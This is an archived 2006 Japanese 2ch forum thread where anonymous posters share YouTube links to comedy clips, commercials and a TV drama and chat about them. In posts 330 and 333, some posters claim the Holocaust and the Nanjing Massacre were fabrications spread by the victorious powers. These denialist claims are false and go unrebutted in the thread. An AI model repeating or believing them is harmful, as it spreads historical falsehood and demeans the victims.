307 :可愛い奥様:2006/12/21(木) 20:47:24 ID:r4ztditN
http://www.youtube.com/watch?v=12PsUW-8ge4

ガイシュツかな?犬・・・?

308 :可愛い奥様:2006/12/21(木) 21:48:20 ID:hCqk5pXj
http://www.youtube.com/watch?v=qVHfF52ne_Q&mode=related&search=
OFF会

309 :可愛い奥様:2006/12/21(木) 22:26:49 ID:wH8OU9+5
ガイシュツですか?
おれおーーーーぉ久々に見てたら見つけた。「言葉に出来ない」系。
ttp://www.youtube.com/watch?v=MyaUWYEKfMQ&NR

310 :可愛い奥様:2006/12/21(木) 22:31:47 ID:jPp4jbVf
http://www.youtube.com/watch?v=sGoNZMmXYlo
エアボーカル。ワロス

311 :可愛い奥様:2006/12/22(金) 00:06:44 ID:ffl9+RQA
>>305
これ、15歳だから「へぇ〜?珍しいね〜!」で終わったかも
しれないけど、林檎も今はイイ歳になったから、(゚Д゚)ハァ?って
言われてオバサン扱いされるのがオチだなw

312 :可愛い奥様:2006/12/22(金) 00:45:11 ID:m51Dz1F+
>>303
は?人それぞれだよ。あなた馬鹿じゃないの?

313 :可愛い奥様:2006/12/22(金) 10:40:35 ID:jtc2cgRH
インドってすごいな〜。インド風味スリラーwww

http://www.youtube.com/watch?v=Ll8Qm8yDj-8&eurl=

http://www.youtube.com/watch?v=p-yAviygMLY




314 :可愛い奥様:2006/12/22(金) 10:57:42 ID:usWzldCR
>>313
ワロタ

315 :可愛い奥様:2006/12/22(金) 12:28:17 ID:gvOhBa5u
>313
インド風味スリラーは何回も見てるけど
自分がインド人だったら これ、笑わずに見れるのかなーとか思っちゃう。


316 :可愛い奥様:2006/12/22(金) 12:37:01 ID:M9BnU3Ys
>313

おもしろさ    
★★★★☆http://www.youtube.com/watch?v=Ll8Qm8yDj-8&eurl=

★★☆☆☆http://www.youtube.com/watch?v=p-yAviygMLY





317 :可愛い奥様:2006/12/22(金) 12:56:59 ID:eIRXxT42
最後のアギレラがかっこいい

http://www.youtube.com/watch?v=q4JvB1cci2A

318 :可愛い奥様:2006/12/22(金) 13:06:31 ID:NFTby4kJ
>>275
関東だけどけっこう流れてたよ。
ホットペッパーのCMいろいろ見たらおもしろかった。
特にSMAPのやつは一気に見るとおもしろい。
http://www.youtube.com/watch?v=229ECQ62FpE&mode=related&search=

319 :可愛い奥様:2006/12/23(土) 04:48:22 ID:iBUz1b8x
>>293
密林で注文してしまった。
ちなみに、楽天よりずっと安かったよ。ナゼなんだろう。

>>295
面白かったw

320 :可愛い奥様:2006/12/23(土) 15:00:18 ID:AM5lYD5a
タマシリーズ。撮ってる人もすげぇな

http://www.youtube.com/watch?v=LatgmyYfQeQ

321 :可愛い奥様:2006/12/23(土) 16:53:17 ID:bwiagCbb
既出だったらスマソ

世にも奇妙な物語「23分間の奇跡」
http://www.youtube.com/watch?v=A-eFfrj6cIA

322 :可愛い奥様:2006/12/23(土) 18:04:15 ID:czxo5CH6
http://www.youtube.com/watch?v=SbIVS_2PrrM
ピカルミソ

323 :可愛い奥様:2006/12/24(日) 03:13:26 ID:poAI5gvj
http://www.youtube.com/watch?v=LKVBaB_mlPQ
オスの精神

324 :可愛い奥様:2006/12/24(日) 22:10:45 ID:DK2XnE3W
ヤナ予感。>321>>322>>323
見た人感想は?

325 :可愛い奥様:2006/12/24(日) 22:19:19 ID:ivh9SEAm
>>324
なんでやな予感なの?
321はリアルで見た。

326 :可愛い奥様:2006/12/24(日) 22:21:41 ID:jqqnx7TE
説明ないのは気持ち悪いからスルー

327 :可愛い奥様:2006/12/24(日) 22:33:57 ID:lFjM0ZWq
322はピカチュウのおもちゃを改造したテルミン。
323は空手とかの爆笑シーン集めたやつだたよ。

328 :可愛い奥様:2006/12/24(日) 22:46:48 ID:izP+fnMH
>>321はジェームズ・クラベルの23分間の奇跡を
そのまま焼きなおした話。タイトルからして、ハートウォーミングな話?
なんて思ってると、全然違う。かくちかこ上手いなーと。

329 :可愛い奥様:2006/12/24(日) 23:21:36 ID:EeAo0xiK
>>328
元の作品がああだから、この作品がもっと怖い。
教育が統制されるってこわいね。
ナチス然り、北朝鮮然り、戦前の日本然り。

330 :可愛い奥様:2006/12/24(日) 23:39:05 ID:QSFqxr9/
>>329
戦前の日本の教育はそういう類いではありませんよ。
それこそそういうイメージ戦略に乗せられてる・・・

ナチスのホロコーストも実際は、戦勝国のイメージ戦略の一部です。

331 :可愛い奥様:2006/12/25(月) 00:21:04 ID:3qlPfEYC
http://www.youtube.com/watch?v=eAz3g3XtYUo&mode=related&search=

332 :可愛い奥様:2006/12/25(月) 01:10:09 ID:OjyJimNB
ようつべ板では、ドラマ見たいんだったらパンドラへ池って言われるんだけど
ハングルばっかりで怖くて行けない。
英語だったらふいんきで大体分かるけど、ハングルは怖いよう。

333 :可愛い奥様:2006/12/25(月) 02:44:28 ID:U2hbGTay
>>330
Wikiのホロコーストなんか読んで見るとホントに戦勝国のイメージ戦略の一部だね
(特に5.2 「ホロコースト」の疑問点 の部分)
ガス部屋で殺害された筈の何百万の死体が実は確認されていないって言うくだりは(((( ;゜Д゜)))ガクガクブルブル
あれって殆どが南京大虐殺と同じく戦勝国のでっち上げなんでしょうか?
詳しい奥様教えてください

334 :可愛い奥様:2006/12/25(月) 03:01:46 ID:gSHUGE0v
http://www.youtube.com/watch?v=hR5tFzF-h3c

335 :可愛い奥様:2006/12/25(月) 19:49:15 ID:oeIWUEc8
>>330
だってうちの親は実際に言ってたよ。
学校で天皇は神様だって教わって、本気でそう信じていたって。
それに、ニュースは映画館で見るんだけれど、
いつもいつも日本は勝っているって言っていたって。
で、戦争反対なんて誰も言える雰囲気でなくて、いつ憲兵が来るかわからないから
びくびく暮らしていたって。
だから、戦後、徹子の部屋なんか見て、「うちの親は戦争反対だって当時から
言っていた。」って自慢げに言うのを聞いて、嘘だ、あの時にそんな事言える訳ないって
信じていなかった。
今72才だけど。

336 :可愛い奥様:2006/12/25(月) 20:16:56 ID:13PdvBVk
なんかとてもよかった
ttp://www.youtube.com/watch?v=nZMCCKBFk0Y
ttp://www.youtube.com/watch?v=87QnJ85WFuA&NR

>>320
( ゚д゚ )この顔にワラタ

337 :可愛い奥様:2006/12/25(月) 20:19:07 ID:YqPpjD0D
>>321
カクチカコってこのころは大根じゃないね。
衣装はテュエリーミュグレ?10年以上前なら斬新な色。
あの茶縞の子、役者やってたよね。

338 :可愛い奥様:2006/12/25(月) 20:19:18 ID:/81S1jDI
ttp://www.youtube.com/watch?v=5Mz0F4RlTxA&NR

八木さんのファンです−どこが?−別に

339 :可愛い奥様:2006/12/26(火) 10:40:08 ID:7eF6+eX5
>>336
じわっときたー。 つД`)・゚・。・゚゚・*:.。


340 :可愛い奥様:2006/12/26(火) 11:11:53 ID:jZDU3DSg
>>321
これ・・・思い出した。
私も12か13歳くらいのときにリアルで見て、意味分からなかった。
茶縞の男の子って、「裏のありそうな役」がうまくて、
当時〜以降数年はよくでてたよね。
名前とか分からないんだけど、彼が今も出てるの見た方います?
最近全く見かけないけど、すごく印象深いから時々思い出す。

341 :可愛い奥様:2006/12/26(火) 11:43:01 ID:+293cRU4
生徒に星野真里がいたみたい。
「綺麗な曲だと思います」っていう黒いセーターの子かな。

342 :可愛い奥様:2006/12/26(火) 11:43:30 ID:xyv3l8aQ
既出かもです

ttp://www.youtube.com/watch?v=EoLX4kvX8rQ&search=vitas

スケートのプルシェンコがトリノのエキシビションで使用した曲。
こんなイケメンが歌っていたとは・・・米良さんをイメージしてたので(汗)

343 :可愛い奥様:2006/12/26(火) 11:46:31 ID:+293cRU4
>>342
ふぁらふぃらふぁらふぃら〜ふぁらふぃら〜
ファーファファーファファファー

こんな曲でやってたっけ

344 :可愛い奥様:2006/12/26(火) 11:51:39 ID:xyv3l8aQ
トリノじゃなかったかも・・・ごめん


345 :可愛い奥様:2006/12/26(火) 12:04:17 ID:jZDU3DSg
>>341
ほんとだ。よく見たら星野真理だ。
あごがそのまんまだ!

346 :可愛い奥様:2006/12/26(火) 12:25:01 ID:m0quN4Rv
最後のオチに感動すら覚えた。

http://www.youtube.com/watch?v=2cmpYHRPqJY&eurl=

347 :可愛い奥様:2006/12/26(火) 13:53:15 ID:gT5j26Hs
>>346
そうきたか!ってかんじ。ほほー。

72 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)